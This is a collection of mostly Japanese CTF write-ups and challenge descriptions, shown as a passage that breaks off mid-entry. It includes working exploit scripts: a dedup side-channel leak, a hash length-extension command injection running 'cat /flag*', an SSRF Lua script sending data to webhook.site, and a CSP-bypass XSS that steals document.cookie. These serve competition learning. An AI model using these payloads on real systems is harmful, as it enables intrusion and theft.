0.5040650367736816, "alphanum_fraction": 0.6991869807243347, "avg_line_length": 16.571428298950195, "blob_id": "591180fb02951b9139fbd7c383fc04202bd32b98", "content_id": "64800fe9949a908f292bfcdc896ec54c978fd40d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 187, "license_type": "no_license", "max_line_length": 
43, "num_lines": 7, "path": "/2021/Zh3r0_CTF_V2/A_Small_Maniacs_game/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nアセンブリ言語を用いたゲームを全部クリアするとフラグが得られる。\n\n![](img/2021-06-05-22-38-14.png)\n\n<!-- zh3r0{s0m3t1m3s_4SM_c4N_g1b_bUrn5} -->\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.8133333325386047, "avg_line_length": 44.20000076293945, "blob_id": "03153c9eb8390b757656a363cf6a8483a96c45ae", "content_id": "c03e6b21bf2aef16e6df37863e8be8bce434ff58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 225, "license_type": "no_license", "max_line_length": 106, "num_lines": 5, "path": "/2020/pbctf_2020/Not-stego/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hallmark of a good CTF is inclusion of Steganography. You asked and we delivered, or didn't we?\n\nBy: theKidofArcrania\n\n[profile.png](https://storage.googleapis.com/pbctf-2020-ctfd/5c4ee97d61acd03c77cda40f72647e49/profile.png)" }, { "alpha_fraction": 0.5270729064941406, "alphanum_fraction": 0.5488511323928833, "avg_line_length": 22.069124221801758, "blob_id": "0b87b3da3bd05d3c4ea961390eae124b4c9a79a8", "content_id": "60366ccbf4598eb32a608b9cca6d4fa9c0af7202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5415, "license_type": "no_license", "max_line_length": 94, "num_lines": 217, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os, secrets, string, time\nfrom flag import flag\n\n\ndef main():\n # It's a tiny server...\n blob = bytearray(2**16)\n files = {}\n used = 0\n\n # Use deduplication to save space.\n def store(data):\n nonlocal used\n MINIMUM_BLOCK = 16\n MAXIMUM_BLOCK = 1024\n part_list = []\n while data:\n prefix = data[:MINIMUM_BLOCK]\n ind = -1\n bestlen, bestind = 0, -1\n while True:\n ind = blob.find(prefix, ind+1)\n if ind == -1: break\n length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))\n if length > bestlen:\n bestlen, bestind = length, ind\n\n if bestind != -1:\n part, data = data[:bestlen], data[bestlen:]\n part_list.append((bestind, bestlen))\n else:\n part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]\n blob[used:used+len(part)] = part\n part_list.append((used, len(part)))\n used += len(part)\n assert used <= len(blob)\n\n fid = \"\".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))\n files[fid] = part_list\n return fid\n\n def load(fid):\n data = []\n for ind, length in files[fid]:\n data.append(blob[ind:ind+length])\n return b\"\".join(data)\n\n print(\"Welcome to our file storage solution.\")\n\n # Store the flag as one of the files.\n store(bytes(flag, \"utf-8\"))\n\n while True:\n print()\n print(\"Menu:\")\n 
print(\"- load\")\n print(\"- store\")\n print(\"- status\")\n print(\"- exit\")\n choice = input().strip().lower()\n if choice == \"load\":\n print(\"Send me the file id...\")\n fid = input().strip()\n data = load(fid)\n print(data.decode())\n elif choice == \"store\":\n print(\"Send me a line of data...\")\n data = input().strip()\n fid = store(bytes(data, \"utf-8\"))\n print(\"Stored! Here's your file id:\")\n print(fid)\n elif choice == \"status\":\n print(\"User: ctfplayer\")\n print(\"Time: %s\" % time.asctime())\n kb = used / 1024.0\n kb_all = len(blob) / 1024.0\n print(\"Quota: %0.3fkB/%0.3fkB\" % (kb, kb_all))\n print(\"Files: %d\" % len(files))\n elif choice == \"exit\":\n break\n else:\n print(\"Nope.\")\n break\n\ntry:\n main()\nexcept Exception:\n print(\"Nope.\")\ntime.sleep(1)\n```\n\n---\n\n[動作の概要]\n\n* `load`\n\n`fid`を入力すると、`files`に登録されている`index`を元に`blob`からデータを取り出す。\n\n```\n例)\n\nfiles = {'hoge':(2,5)}\nblob = b'12345678'\n\nfid = 'hoge'\ndata = b'34567'\n```\n\n* `status`\n\n`blob`内のデータサイズ`used`が分かる。\n\n* `store`\n\n`blob`にデータを格納し、`fid`を返す。\n\n* `exit`\n\nプログラムを終了する。\n\n---\n\n`store`を使ってデータを格納するとき、データを16バイトで区切り、同じ文字列があれば同じ`index`を`files`に記憶していることが分かった。\n\n```\n例)\n\nfiles = {'hoge':(2,5)}\nblob = b'12345678'\n\nfid = 'hoge'\ndata = b'34567'\n\n# store 123\nfiles = {'hoge':(2,5), 'fuga':(0,3)}\n```\n\nつまり、既に`store`されている文字列と同じ文字列を`store`すると、`blob`内のデータサイズ`used`が増えない。\n\nよって、`used`が増えないような文字列を見つければよい。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\nimport re\nimport string\n\nSTRING = string.digits + string.ascii_letters + string.punctuation\n\nio = remote('filestore.2021.ctfcompetition.com', '1337')\nio.recvuntil('exit\\n')\n\ndef store(data):\n io.sendline('store')\n io.sendline(data)\n io.recvuntil('exit\\n')\n\ndef status():\n io.sendline('status')\n storage = re.search(r'(\\d\\.\\d+)kB/', io.recvuntil('Menu').decode('utf-8')).group(1)\n io.recvuntil('exit\\n')\n return float(storage)\n\npattern = '0134cdfinptuCFMPRT_{}'\n## searching used char in the flag \n# pattern = ''\n# for s in STRING:\n# current = status()\n# store(s)\n# after = status()\n# if current == after:\n# pattern += s\n\nflag = 'CTF'\nwhile True:\n tmp = flag[-1]\n while True:\n for p in pattern:\n current = status()\n store(tmp + p)\n after = status()\n if current == after:\n tmp += p\n print(tmp)\n break\n if len(flag) % 16 == 0 or p == '}':\n break\n flag += tmp[1:]\n if flag[-1] == '}':\n break\nprint(flag)\n\nio.close()\n```\n\n<!-- CTF{CR1M3_0f_d3dup1ic4ti0n} -->" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.7872340679168701, "avg_line_length": 15, "blob_id": "6376ce8a41ddcf94ce0ba917ab8885e90e387c1f", "content_id": "c9d9953f7a89a51d8d5c32325f83d78917c66a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Raise the Flag\n\nhttps://ctftime.org/team/137917" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 17, "blob_id": "ec0e61fd5cef0889f1d055ecb823b4acdfce1ff3", "content_id": "bb4f4c2f7f235a5c4fec9c8e6f7a94aded781fbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "no_license", "max_line_length": 52, "num_lines": 13, "path": "/2021/BCACTF_2.0/Zstegosaurus/writeup.md", "repo_name": 
"security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n画像ファイルが与えられる。\n\n`zsteg`を使って調べたところ、文字列が隠されていた。\n\n```\n$ zsteg zstegosaurus.png\nb1,r,lsb,xy .. text: \"h15_n@m3_i5nt_g3rard\"\nb4,rgb,msb,xy .. text: [\"w\" repeated 10 times]\n```\n\n<!-- bcactf{h15_n@m3_i5nt_g3rard} -->\n" }, { "alpha_fraction": 0.5988200306892395, "alphanum_fraction": 0.8643068075180054, "avg_line_length": 66.80000305175781, "blob_id": "33bc7b4c21a8dcccf3842c9736d5087f78e694b9", "content_id": "8fe37ad182945ee1a5815cb06d08763fe2f02484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 339, "license_type": "no_license", "max_line_length": 203, "num_lines": 5, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We stored our flag on this platform, but forgot to save the id. Can you help us restore it?\n\n[Attachment](https://storage.googleapis.com/gctf-2021-attachments-project/6e5c4cbba595ef1c9d22bfd958dc9144b863081d359a4c27a366c5b8d48b99a26d9b5c4c4bb56db7890b6f188a1ae1b4371d568a22a12e4386d3c0f91dc6c29b)\n\n`filestore.2021.ctfcompetition.com 1337`\n" }, { "alpha_fraction": 0.6306474208831787, "alphanum_fraction": 0.6707032918930054, "avg_line_length": 34.79999923706055, "blob_id": "5c95fd8a1c2e55da64e953f1127f12552c5b49a3", "content_id": "4c0599e4d85468feed2bbed71e601b761c9e7b39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2147, "license_type": "no_license", "max_line_length": 143, "num_lines": 60, "path": "/2020/hxp_CTF_2020/nanothorpe/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original : https://github.com/TalaatHarb/ctf-writeups/blob/main/hxpctf2020/nanothorpe/exploit.py\nimport requests\nimport base64\n\nfrom urllib.parse import parse_qsl, unquote_to_bytes, urlencode\nfrom struct import pack, unpack\n\nfrom nanothorpe.octothorpe import octothorpe\n\ndef parse(query_string):\n return dict(parse_qsl(query_string, errors='ignore')), unquote_to_bytes(query_string)\n\n# base_url = 'http://157.90.22.14:8832/'\nbase_url = 'http://localhost:8832/'\n\nheaders = {\\\n 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\\\n 'Referer' : base_url,\\\n 'Accept' : '*/*',\\\n 'Connection' : 'keep-alive',\\\n 'Accept-Language' : 'en-US,en;q=0.9'\\\n}\n\nparams1 = {\\\n 'cmd' : 'ls'\\\n}\n\nsecret_length = 32 # got it by trail and error\nr1 = requests.get(base_url + 'api/authorize', headers=headers, params=params1, allow_redirects=False)\nsignature = r1.cookies.get('signature')\npath_url = r1.next.path_url\nargs, decoded = parse(path_url[path_url.index('?')+1:])\nexpiry = r1.next.path_url[path_url.index('=')+1:path_url.index('&')]\n\n# Actual exploit here : manuiplating the signature to allow another command\nactual_length = secret_length + len(decoded)\npadding = b'\\x80' + b'\\x00' * ((octothorpe.block_size - 9 - actual_length) % octothorpe.block_size) + (8 * actual_length).to_bytes(8, 'little')\nb = b'&cmd=cat+/flag*'\nn = actual_length + len(padding)\nha = signature\nhb = octothorpe(b, _length=n, _state=bytearray.fromhex(ha)).hexdigest()\n\nold_cmd = {'expiry':expiry,'cmd': (b'ls' + padding)}\nnew_cmd = {'cmd':(b'cat /flag*')}\n\nold_enc = urlencode(old_cmd)\nnew_enc = urlencode(new_cmd)\n\nparameters = (old_enc + '&' + new_enc) # parameters = 
{'expiry':expiry,'cmd':'old_cmd+padding','cmd':'new_cmd'}\n\ncookies2 = {\\\n 'signature' : hb\\\n}\n\n# End of trickery\nr2 = requests.get(base_url + 'api/run?' + parameters, headers=headers, cookies=cookies2, allow_redirects=False)\nstatus_code = r2.status_code\n\nif status_code != 403 and status_code != 503:\n print(base64.b64decode(r2.json()['stdout']).decode('utf-8').rstrip(), sep='')" }, { "alpha_fraction": 0.6439024209976196, "alphanum_fraction": 0.8487805128097534, "avg_line_length": 40.20000076293945, "blob_id": "7d0e389457c10571b0445960e5227082b8cbd5aa", "content_id": "6202bc58c5f2398123df721c6885b2f77b8e8436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 131, "num_lines": 5, "path": "/2021/DiceCTF_2021/babymix/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Just the right mix of characters will lead you to the flag :)\n\nDownloads\n\n[babymix](https://dicegang.storage.googleapis.com/uploads/3821fb32cc49474f2431d2c27e3c696c856e57dcd719d5c0bd3739435afc755a/babymix)" }, { "alpha_fraction": 0.643750011920929, "alphanum_fraction": 0.762499988079071, "avg_line_length": 25.66666603088379, "blob_id": "29cc9621419ab7cb1c241cd2da9c49e2b6283ed7", "content_id": "235713bd6a5bd076293c0d2e086af63a76dde264", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 160, "license_type": "no_license", "max_line_length": 98, "num_lines": 6, "path": "/2021/HeroCTF_v3/Ping_Pong/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Could you get the flag ?\n\nFormat : Hero{}\nAuthor : xanhacks\n\n[output.txt](https://www.heroctf.fr/files/9d840ae120320372481f4b7cbfd7beeb/output.txt?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIzfQ.YIQj7g.zFG502UF7YnpS_Q19ej_cmChX3I)\n" }, { "alpha_fraction": 0.7635135054588318, "alphanum_fraction": 0.7635135054588318, "avg_line_length": 20.14285659790039, "blob_id": "7c83c15ad38d8c7e48b353a5c151192b8178bce9", "content_id": "e315876ed579dc78c6ca97cddb3743c99ae643ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 70, "num_lines": 7, "path": "/2021/HeroCTF_v3/We_need_you_2_5/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It must be their team name.\n\nFor this second step, find the user's name and password in clear text.\n\nAuthor: Worty\n\nFormat: Hero{Username:Password}\n" }, { "alpha_fraction": 0.7309644818305969, "alphanum_fraction": 0.7664974331855774, "avg_line_length": 27.285715103149414, "blob_id": "f37443420cbc75fd067e77c080319fb3baaaa479", "content_id": "383472e21be9a490ad18362b91c25a045a922041", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 197, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Check out my super safe website! Enter the password to get the flag\n\nhttp://web.bcactf.com:49157/\n\nHint 1 of 1\n\nHow does the Web Assembly check the password you entered, and what is it looking for?" 
}, { "alpha_fraction": 0.6097561120986938, "alphanum_fraction": 0.8130081295967102, "avg_line_length": 40.33333206176758, "blob_id": "e7d66b9861239595b1b0e3cf982182a6c2758876", "content_id": "112e79b94c4ddecd25e947e8f583dd5cd76293d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 115, "num_lines": 3, "path": "/2021/RITSEC_CTF_2021/BIRDTHIEF_FYSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "~knif3\n\n[BIRDTHIEF_FYSA.pdf](https://ctf.ritsec.club/files/da6836558110e083f9777504def7b588/BIRDTHIEF_FYSA.pdf?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6OX0.YHGfhA.fKjChdB8Es9vcccju1Rz8U4rfwo)" }, { "alpha_fraction": 0.6356877088546753, "alphanum_fraction": 0.6956319808959961, "avg_line_length": 20.96938705444336, "blob_id": "87f84161c9118c1552194fcc560184e22bc7a70c", "content_id": "d25ecb994e964eb489ebeba856cab360ba6eff9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2906, "license_type": "no_license", "max_line_length": 130, "num_lines": 98, "path": "/2020/pbctf_2020/Sploosh/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\nリンク先にアクセスすると以下のような画面が表示される。\n\n![](img/2020-12-05-16-46-54.png)\n\n適当にURLを入力し、Submitすると謎の数字が出力される。\n\n![](img/2020-12-05-16-47-50.png)\n\nまた、このページでソースコードをダウンロードできる。[[source code](dist.zip)]\n\nユーザーが値をSubmitしたとき、サーバーサイドでの動作は次のようになる。\n\n`index.php`\n\n* `api.php?url=`を呼び出す\n\n`api.php`\n\n* `file_get_contents(\"http://splash:8050/render.json?timeout=1&url=\" . urlencode($url))`を実行する\n\n* 実行結果をJSON形式で返す\n\n * `{\"geometry\":[0,0,1024,768]}`\n\n`index.php`\n\n* `api.php`の戻り値を表示する\n\n脆弱性がありそうなのは`api.php`で、ここで`flag.php`を呼び出すことができれば良さそう。\n \n| input | output |\n| ------------- | ------------ |\n| ` ` | undefined |\n| `php://input` | null |\n| `flag` | 0,0,1024,768 |\n\n`file_get_contents`では`scrapinghub/splash`の`render.json`にアクセスしている。\n\nそのため、PHPの実行結果を`geometry`キーの値に設定できないか、Splashのドキュメントを読んで調べる。\n\n* https://splash.readthedocs.io/en/stable/api.html\n\n# Solution\n\n**[writeup]**\n\n* https://ctftime.org/writeup/25207\n\n`Splash`でLuaスクリプトを実行する。\n\n* [Splash Scripts Tutorial](https://splash.readthedocs.io/en/stable/scripting-tutorial.html#scripting-tutorial)\n\n実行するスクリプトは以下の通り。\n\n```lua\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. treat.as_string(json.body))\nend \n```\n\nこれを`execute?lua_source=`に渡せばよい。\n\n実行結果はWebhookで受け取る。今回は https://webhook.site/ を使う。\n\n```py\nimport requests\nfrom urllib.parse import quote\n\nlua=\"\"\"\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. 
treat.as_string(json.body))\nend \n\"\"\"\n \nurl='http://sploosh.chal.perfect.blue/api.php?url=http://splash:8050/execute?lua_source='+quote(lua)\nresponse=requests.get(url)\nprint(response.text)\n```\n\n上記コードを実行すると、Webhookに対するリクエストを見ることができる。\n\n![](img/2020-12-07-20-24-41.png)\n\n<!-- pbctf{1_h0p3_y0u_us3d_lua_f0r_th1s} -->\n\n## Comment\n\nWebhookを使った問題が初めてだった。\n\nまた、APIドキュメントを読んでLuaスクリプトが実行できることはわかっていたが、パラメータの渡し方がわかっていなかった。" }, { "alpha_fraction": 0.6820027232170105, "alphanum_fraction": 0.7449255585670471, "avg_line_length": 24.05084800720215, "blob_id": "ab23bee1a131943d71234058973a10cfdc635c9f", "content_id": "01901066edc6b08c75cb567b54f84bf5aa9921b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 152, "num_lines": 59, "path": "/2020/SquareCTF2020/Oh_Sheet/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Solved ?\n\n# Try\n\n[リンク](https://docs.google.com/spreadsheets/d/15PFb_fd6xKVIJCF0b0XiiNeilFb-L4jm2uErip1woOM/edit#gid=0)先はGoogle SpreadSheetで、以下のような内容が記載されている。\n\n```\nMake a copy of this sheets, by going to File->Make a copy\t\t\n\t\t\nNote that the key consists of lowercase letters, and has no repeated letters. It is 9 characters long. Order of characters matters!\t\t\nKey:\tabcdefg\t\n\t\t\t\t\nCiphertext\tՑÜÑàσëÞåØäÑëÜÇÞÔå\t\nPlaintext\ts/vi{cŠ|‚pe„{c{l€\t\n🚩 = flag{abcdefg}\n```\n\nセルの中身を見てみると、`Plaintext`は`CONCATENATE(Q81:Q208)`の値が入ることが分かる。\n\n![](img/2020-11-14-12-37-10.png)\n\nまた、`Key`を変えると`(Q81:Q208)`の値が変わり、`Plaintext`も変化する。そして`Key`がフラグになっているようだ。\n\n![](img/2020-11-14-12-40-39.png)\n\n81行目から208行目を見てみる。\n\nどうやら白文字にして値を隠しているので文字色を変えてみる。\n\n(key = abcdefghi)\n![](img/2020-11-14-13-22-06.png)\n\nまた、`A29`,`M80`には以下のメッセージが隠されている。\n\n```\nHint: can you write an encryption algorithm that undoes the decryption algorithm below?\n\nFinding the right difference between ascii codes (hint: the value must be > 0, but less than 26. Why < 26?) Another hint: we repeat the alphabet at E26!\n```\n\nCiphertextとKeyのASCIIコードの差がL列に反映されていて、そのL列をKeyのアルファベット位置(index)分前にRotationしたものがPlaintextになっている。\n\n`Plaintext = ROT(chr((ord(cipertext) - ord(key))), -index(key))`\n\nこれを踏まえると暗号化は、\n\n`Ciphertext = chr(ord(key)+ord(ROT(plaintext,index(key))))`\n\nと書ける。\n\n暗号化の方法が分かったので、plaintextが分かればkeyも分かるのだが...\n\nkeyの9文字の単語で思い当たった`squarectf`を試しに入れてみると、\n\n![](img/2020-11-14-18-29-51.png)\n\n偶然それっぽくなってしまった。 どうやるのが正攻法なのだろうか...。\n\n<!-- flag{squarectf} -->\n" }, { "alpha_fraction": 0.6343426704406738, "alphanum_fraction": 0.6834036111831665, "avg_line_length": 33.78666687011719, "blob_id": "2dbfb50b89b7edaba5292bbf2601d3a83fe71911", "content_id": "a4a6a618616421be0abe1193b281eefe40d6ab2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3165, "license_type": "no_license", "max_line_length": 287, "num_lines": 75, "path": "/2021/WeCTF_2021/CSP_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[csp1.sf.ctf.so](http://csp1.sf.ctf.so/) にアクセスすると、入力フォームが表示される。\n\n![](img/2021-06-20-12-58-22.png)\n\nscriptタグでXSSを試みる。\n\n```js\n<script>document.write(\"hoge\");</script>\n```\n\nスクリプトの実行はContent Security Policy(CSP)によって防がれている。\n\n```\nRefused to execute inline script because it violates the following Content Security Policy directive: \"script-src 'none'\". 
Either the 'unsafe-inline' keyword, a hash ('sha256-j6r2Eh5tpXDVkX3teOfQfOcZzBMcX025w27wtNr3XAc='), or a nonce ('nonce-...') is required to enable inline execution.\n```\n\nソースコードを見ると、imgタグのsrc要素の値をCSPのヘッダに含めることができると分かる。\n\n```py\ndef filter_url(urls):\n domain_list = []\n for url in urls:\n domain = urllib.parse.urlparse(url).scheme + \"://\" + urllib.parse.urlparse(url).netloc\n if domain:\n domain_list.append(domain)\n return \" \".join(domain_list)\n\ndef display(token):\n user_obj = Post.select().where(Post.token == token)\n content = user_obj[-1].content if len(user_obj) > 0 else \"Not Found\"\n img_urls = [x['src'] for x in bs(content).find_all(\"img\")]\n tmpl = render_template(\"display.html\", content=content)\n resp = make_response(tmpl)\n resp.headers[\"Content-Security-Policy\"] = \"default-src 'none'; connect-src 'self'; img-src \" \\\n f\"'self' {filter_url(img_urls)}; script-src 'none'; \" \\\n \"style-src 'self'; base-uri 'self'; form-action 'self' \"\n return resp\n```\n\nscriptタグを実行させるためには`script-src 'none'`の部分をどうにかして無効化しなくてはならない。\n\nCSPヘッダに挿入される値はURLパースされるが、ドメイン部分に`/`が来るまで自由な値が書ける。\n\nこれを利用して以下のような入力をすると、\n\n```\n<img src=\"https://webhook.site ;script-src 'nonce-hoge'\"/>\n```\n\nCSPヘッダは次のようになる。\n\n```\nConnection: keep-alive\nContent-Encoding: gzip\nContent-Security-Policy: default-src 'none'; connect-src 'self'; img-src 'self' https://webhook.site ;script-src 'nonce-hoge'; script-src 'none'; style-src 'self'; base-uri 'self'; form-action 'self'\nContent-Type: text/html; charset=utf-8\nDate: Sun, 20 Jun 2021 11:10:56 GMT\nServer: nginx/1.18.0 (Ubuntu)\nTransfer-Encoding: chunked\n```\n\nこのようにCSPヘッダを設定すると、`<script nonce=\"hoge\"></script>`内のスクリプトが実行できるようになるので、XSSを行う。\n\n```js\n<img src=\"https://webhook.site ;script-src 'nonce-hoge'\"/>\n<script nonce=\"hoge\">location.href=\"https://webhook.site/e27c0501-e42a-4eb9-a573-ef6cf99e8f90/?q=\"+document.cookie;</script>\n```\n\nあとは[uv.ctf.so](https://uv.ctf.so/)を使い、adminユーザーに上記スクリプトが実行される`http://csp1.ny.ctf.so/display/664f79ba-dccc-4589-9048-960aa0b9b4e3`にアクセスしてもらえばcookieを取得できる。\n\n![](img/2021-06-20-21-54-41.png)\n\n<!-- we{2bf90f00-f560-4aee-a402-d46490b53541@just_L1k3_<sq1_injEcti0n>} -->\n" }, { "alpha_fraction": 0.4411473870277405, "alphanum_fraction": 0.6567754745483398, "avg_line_length": 22.511627197265625, "blob_id": "9b728dbcf50581bae955456996c2384de1852013", "content_id": "63aa324762e5868bf7e512f1fc3c66353ad3f24d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 214, "num_lines": 43, "path": "/2021/BCACTF_2.0/Storytime_The_Tragic_Interlude/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file story2\nstory2: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1e3cbcc533556d3e4ce1edb0848a21cef1b10365, for GNU/Linux 3.2.0, not stripped\n```\n\nGhidraで解析する。以下の部分が怪しい。\n\n```c\n while (local_724 < 0x25) {\n *(char *)((long)&local_38 + (long)local_724) =\n (char)local_724 + (char)(*(int *)((long)&local_718 + (long)local_724 * 4) >> 1);\n local_724 = local_724 + 1;\n }\n```\n\n```\n*(char *)((long)&local_38 + (long)local_724)\n\n↓\n\n001013fa 88 54 05 d0 MOV byte ptr [RBP + RAX*0x1 + -0x30],DL\n```\n\nこの命令の後にBreakpointを設定しDLの値を監視していく。\n\n```gdb\nb *main+(0x1013fe-0x1011e4)\n\ndisp $dl\n```\n\n```py\ndl = 
[0x62,0x63,0x61,0x63,0x74,0x66,0x7b,0x74,0x68,0x34,0x74,0x5f,0x30,0x74,0x68,0x33,0x72,0x5f,0x64,0x72,0x34,0x67,0x30,0x6e,0x5f,0x37,0x36,0x66,0x77,0x38,0x6b,0x63,0x31,0x6c,0x61,0x76,0x7d]\n\nfor d in dl:\n print(chr(d),end='')\n```\n\n<!-- bcactf{th4t_0th3r_dr4g0n_76fw8kc1lav} -->\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 27.285715103149414, "blob_id": "a6d2058c807931efe13721195de6aa22067f8866", "content_id": "191070fb4aebed46a8883262ddfa783b22f789cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 97, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/p-8RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It looks someone is encrypting it with RSA.\n\n[p-8RSA.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/p-8RSA/p-8RSA.tar.gz)\n\n909a5db23e24c1e89177cef165426efb571e6679\n\n想定難易度: Hard\n" }, { "alpha_fraction": 0.25071224570274353, "alphanum_fraction": 0.7849003076553345, "avg_line_length": 17.972972869873047, "blob_id": "138dc1a5ee0f656f52ab710ad6f0c6117b42ba7e", "content_id": "68cda25022e607f930dc5d7b0f250b345ab29a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 822, "license_type": "no_license", "max_line_length": 68, "num_lines": 37, "path": "/2021/BCACTF_2.0/Slightly_Harder_RSA/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nn = 947358141650877977744217194496965988823475109838113032726009\ne= 65537\nct=811950322931973288295794871117780672242424164631309902559564\n```\n\nRSA暗号で`n`が小さそうなので、factorDBで因数分解してみる。\n\n```\nn = 884666943491340899394244376743 * 1070864180718820651198166458463\n```\n\nであることが分かった。 `p, q` が分かったので復号化する。\n\n```py\nfrom Crypto.Util.number import *\n\nn = 947358141650877977744217194496965988823475109838113032726009\ne = 65537\nct = 811950322931973288295794871117780672242424164631309902559564\n\np = 884666943491340899394244376743\nq = 1070864180718820651198166458463\n\nassert n == p * q\n\nd = pow(e,-1,(p-1)*(q-1))\nmt = pow(ct,d,n)\n\nprint(long_to_bytes(mt))\n```\n\n<!-- bcactf{rsa_factoring} -->\n" }, { "alpha_fraction": 0.6496350169181824, "alphanum_fraction": 0.7034671306610107, "avg_line_length": 26.412500381469727, "blob_id": "e8babab31947e7c36608666bfb8890d81bca7412", "content_id": "2be7c62b50025f84f2a1dd1ef425d1fc4ef9e481", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2706, "license_type": "no_license", "max_line_length": 183, "num_lines": 80, "path": "/2021/DiceCTF_2021/Babier_CSP/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[babier-csp.dicec.tf](https://babier-csp.dicec.tf/)にアクセスする。\n\n![](img/2021-02-20-16-48-15.png)\n\nView Fruit をクリックすると、`https://babier-csp.dicec.tf/?name=orange`といった`name`クエリに入っている文字が表示される。ソースコードは以下。\n\n```js\nconst express = require('express');\nconst crypto = require(\"crypto\");\nconst config = require(\"./config.js\");\nconst app = express()\nconst port = process.env.port || 3000;\n\nconst SECRET = config.secret;\nconst NONCE = 